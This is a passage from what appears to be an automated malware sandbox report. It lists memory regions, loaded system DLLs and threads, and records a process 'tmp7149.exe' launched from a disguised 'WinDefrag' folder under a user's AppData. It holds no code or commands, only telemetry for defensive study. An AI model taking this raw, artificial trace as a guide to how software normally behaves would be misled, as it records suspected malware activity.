0x396fff entry_point = 0x330000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2296 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2297 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2298 start_va = 0x440000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2299 start_va = 0x4d0000 end_va = 0x4d4fff entry_point = 0x4d0000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\SysWOW64\\dllhost.exe" (normalized: "c:\\windows\\syswow64\\dllhost.exe") Region: id = 2300 start_va = 0x4e0000 end_va = 0x667fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 2301 start_va = 0x670000 end_va = 0x7f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 2302 start_va = 0x800000 end_va = 0x1bfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 2303 start_va = 0x1c90000 end_va = 0x1ccffff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 2304 start_va = 0x1d00000 end_va = 0x1d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 2305 start_va = 0x1dc0000 end_va = 0x1dfffff entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 2306 start_va = 0x1e30000 end_va = 0x1e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 2307 start_va = 0x1e70000 end_va = 0x213efff entry_point = 0x1e70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2308 start_va = 0x2150000 end_va = 0x218ffff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 2309 start_va = 0x2190000 end_va = 0x21cffff entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 2310 start_va = 0x2220000 end_va = 0x225ffff entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 2311 start_va = 0x22b0000 end_va = 0x22effff entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 2312 start_va = 0x22f0000 end_va = 0x23cefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022f0000" filename = "" Region: id = 2313 start_va = 0x2440000 end_va = 0x247ffff entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 2314 start_va = 0x74660000 end_va = 0x7466bfff entry_point = 0x74660000 region_type = mapped_file name = "cmlua.dll" filename = "\\Windows\\SysWOW64\\cmlua.dll" (normalized: "c:\\windows\\syswow64\\cmlua.dll") Region: id = 2315 start_va = 0x75210000 end_va = 0x7528ffff entry_point = 0x75210000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2316 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2317 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2318 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2319 start_va = 0x75380000 end_va = 0x7538dfff entry_point = 0x75380000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 2320 start_va = 0x75390000 end_va = 0x7539dfff entry_point = 0x75390000 region_type = mapped_file name = "cmutil.dll" filename = "\\Windows\\SysWOW64\\cmutil.dll" (normalized: "c:\\windows\\syswow64\\cmutil.dll") Region: id = 2321 start_va = 0x753a0000 end_va = 0x753a7fff entry_point = 0x753a0000 region_type = mapped_file name = "cmstplua.dll" filename = "\\Windows\\SysWOW64\\cmstplua.dll" (normalized: "c:\\windows\\syswow64\\cmstplua.dll") Region: id = 2322 start_va = 0x753b0000 end_va = 0x753b8fff entry_point = 0x753b0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2323 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2324 start_va = 0x75520000 end_va = 0x75535fff entry_point = 0x75520000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2325 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2326 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2327 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2328 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2329 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2330 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2331 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2332 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2333 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2334 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2335 start_va = 0x76040000 end_va = 0x760c2fff entry_point = 0x76040000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2336 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2337 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2338 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2339 start_va = 0x76720000 end_va = 0x767aefff entry_point = 0x76720000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2340 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2341 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2342 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2343 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2344 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 2345 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 2346 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2347 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2348 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 2349 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2350 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2351 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2352 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2353 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2354 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2355 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2356 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2357 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2358 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2359 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2360 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2361 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 2362 start_va = 0x90000 end_va = 0x91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 2363 start_va = 0x130000 end_va = 0x131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 2364 start_va = 0x2400000 end_va = 0x243ffff entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2365 start_va = 0x2530000 end_va = 0x256ffff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 2366 start_va = 0x74dd0000 end_va = 0x74ec4fff entry_point = 0x74dd0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 2367 start_va = 0x74ed0000 end_va = 0x7506dfff entry_point = 0x74ed0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2368 start_va = 0x75410000 end_va = 0x75430fff entry_point = 0x75410000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 2369 start_va = 0x76530000 end_va = 0x76574fff entry_point = 0x76530000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 2370 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 2371 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 2372 start_va = 0x1e0000 end_va = 0x1fffff entry_point = 0x1e0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 2373 start_va = 0x75950000 end_va = 0x7595afff entry_point = 0x75950000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2392 start_va = 0xa0000 end_va = 0xa3fff entry_point = 0xa0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2393 start_va = 0x190000 end_va = 0x193fff entry_point = 0x190000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2394 start_va = 0x200000 end_va = 0x22ffff entry_point = 0x200000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 2395 start_va = 0x1c00000 end_va = 0x1c65fff entry_point = 0x1c00000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 2396 start_va = 0x2570000 end_va = 0x266ffff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 2397 start_va = 0x75f20000 end_va = 0x75f31fff entry_point = 0x75f20000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2398 start_va = 0x76580000 end_va = 0x7671cfff entry_point = 0x76580000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2399 start_va = 0x77750000 end_va = 0x77776fff entry_point = 0x77750000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2400 start_va = 0x3a0000 end_va = 0x3a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 2401 start_va = 0x3b0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2402 start_va = 0x2670000 end_va = 0x2a62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 2403 start_va = 0x74630000 end_va = 0x7465dfff entry_point = 0x74630000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Region: id = 2404 start_va = 0x753c0000 end_va = 0x7540bfff entry_point = 0x753c0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2405 start_va = 0x2ac0000 end_va = 0x2afffff entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 2406 start_va = 0x2b00000 end_va = 0x2b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 2407 start_va = 0x75ac0000 end_va = 0x75bf5fff entry_point = 0x75ac0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2408 start_va = 0x76330000 end_va = 0x7644cfff entry_point = 0x76330000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2409 start_va = 0x767e0000 end_va = 0x769dafff entry_point = 0x767e0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2410 start_va = 0x77800000 end_va = 0x7780bfff entry_point = 0x77800000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2411 start_va = 0x77920000 end_va = 0x77a14fff entry_point = 0x77920000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2412 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Thread: id = 138 os_tid = 0x404 Thread: id = 139 os_tid = 0x760 Thread: id = 140 os_tid = 0x7bc Thread: id = 141 os_tid = 0x308 Thread: id = 142 os_tid = 0x79c Thread: id = 143 os_tid = 0x318 Thread: id = 144 os_tid = 0x584 Thread: id = 145 os_tid = 0x664 Process: id = "17" image_name = "tmp7149.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.exe" page_root = "0x77ca8000" os_pid = "0x668" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x368" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2413 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2414 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2415 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2416 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2417 start_va = 0x90000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2418 start_va = 0x290000 end_va = 0x293fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 2419 start_va = 0x400000 end_va = 0x487fff entry_point = 0x400000 region_type = mapped_file name = "tmp7149.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.exe") Region: id = 2420 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2421 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2422 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2423 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2424 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2425 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2426 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2427 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2428 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2429 start_va = 0x680000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 2430 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2431 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2432 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2433 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2434 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2435 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2436 start_va = 0x8f0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 2437 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2438 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2439 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2440 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 2441 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 2442 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2443 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2444 start_va = 0x20000 end_va = 0x3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2460 start_va = 0x490000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2461 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 2462 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2463 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2464 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2465 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2466 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2467 start_va = 0x75520000 end_va = 0x75535fff entry_point = 0x75520000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2468 start_va = 0x320000 end_va = 0x35bfff entry_point = 0x320000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2469 start_va = 0x320000 end_va = 0x35bfff entry_point = 0x320000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2470 start_va = 0x320000 end_va = 0x35bfff entry_point = 0x320000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2471 start_va = 0x320000 end_va = 0x35bfff entry_point = 0x320000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: 